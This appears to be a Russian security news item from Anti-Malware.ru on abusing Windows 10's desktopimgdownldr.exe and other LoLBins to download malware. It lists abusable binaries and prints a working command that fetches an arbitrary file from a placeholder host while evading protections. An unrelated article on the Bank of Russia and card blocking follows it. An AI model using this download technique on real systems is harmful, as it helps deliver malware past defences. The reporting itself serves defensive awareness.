Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Банк России опроверг массовую блокировку платежных карт

Банк России опроверг сообщения о якобы массовой блокировке банковских карт на фоне расширения перечня признаков подозрительных операций и ужесточения контроля за переводами. В начале недели в СМИ появилась информация о резком росте числа заблокированных карт.

В публикациях со ссылкой на экспертные оценки компании «Информзащита» утверждалось, что с начала года могло быть заблокировано до 3 млн карт. Для сравнения: в ноябре регулятор официально сообщал об «охлаждении» порядка 330 тыс. переводов.

Сообщения связывали с усилением контроля за финансовыми операциями со стороны Росфинмониторинга и Банка России. Ещё в конце декабря 2025 года многие пользователи сталкивались с заморозкой платежей и переводов, в том числе между собственными счетами. В отдельных случаях речь шла не только о приостановке конкретных операций, но и о блокировке всего счёта. При этом доступ восстанавливался только после личного обращения в банк и не всегда оперативно.

Однако в ЦБ назвали информацию о массовых блокировках некорректной.

«С 1 января по 19 января 2026 года мы получили 7431 обращение граждан по поводу блокировки карт. Это вдвое меньше обычного уровня обращений», — сообщила пресс-служба Банка России «Российской газете».

Как уточнили в регуляторе, при выявлении признаков мошенничества карты и счета не блокируются автоматически. В таких случаях перевод либо отклоняется, либо приостанавливается на срок до 48 часов. Банк обязан уведомить клиента о принятых мерах и предоставить возможность подтвердить операцию не позднее чем через сутки. После получения подтверждения транзакция должна быть проведена незамедлительно.

Доцент Финансового университета при правительстве РФ Пётр Щербаченко связал рост числа жалоб с усилением мер по противодействию мошенникам и назвал оценку в 3 млн отклонённых операций явно завышенной:

«Меры по борьбе с мошенническими операциями в первую очередь затрагивают дропов — людей, на которых оформляют десятки и даже сотни карт, в том числе виртуальных. Именно такие карты могли массово попадать под блокировки, что усложняет преступникам вывод похищенных средств».

В Банке России также отметили, что постоянно дорабатывают механизмы реабилитации клиентов, ошибочно попавших в перечень подозреваемых в мошеннических операциях. В частности, это касается пользователей, проводивших операции с криптовалютой. Работа в этом направлении будет продолжена.

RSS: Новости на портале Anti-Malware.ru